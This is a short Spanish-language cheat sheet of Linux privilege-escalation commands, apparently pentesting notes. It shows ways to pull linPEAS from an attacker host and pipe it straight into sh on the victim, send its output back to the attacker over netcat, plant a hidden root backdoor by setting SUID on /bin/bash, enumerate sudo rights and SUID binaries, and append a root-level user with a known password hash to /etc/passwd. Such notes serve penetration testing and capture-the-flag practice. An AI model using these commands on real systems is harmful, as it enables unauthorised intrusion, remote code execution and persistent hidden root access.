July 31, 2025

Escalar privilegios

Escaner para PE

El script “linPeas.sh” nos permite comprobar las distintas vulnerabilidades que podemos aprovechar en un sistema para escalar privilegios. https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md

Podemos descargar del repositorio directamente el script a la victima, o servirlo desde nuestra máquina. Estas son 3 maneras de hacerlo:

sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
sudo nc -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

Crear acceso persistente a escalada de privilegios

Vamos a crear una puerta trasera que nos permita escalar privilegios al root. Una vez hayamos vulnerado el sistema y hayamos conseguido ser root, para mantener esta puerta trasera a la escalada de privilegios de una manera oculta haremos lo siguiente:

chmod +s /bin/bash

(necesitamos ser root)

Con esto activamos el set UIID, lo cual le permite a root mantener sus permisos al ejecutar el siguiente comando:

/bin/bash -p

Esto nos abrirá una nueva shell en la que seremos root.

Ver ejecutables con sudo

sudo -l

Buscar PE en binarios

searchbins -b [binario] -f [funcion]

[¹]

[¹]:Las funciones pueden ser por ejemplo: sudo, suid, shell…

Buscar binarios con SUID

find / -perm -4000 2>/dev/null

Modificar /etc/passwd

Añadimos un usuario del grupo de root con la contraseña 1234.

echo 'newroot:$1$WU/h0npd$0.uJrgDhvk4xoONhhcK.20:0:0::/home/newroot /bin/bash' >> /etc/passwd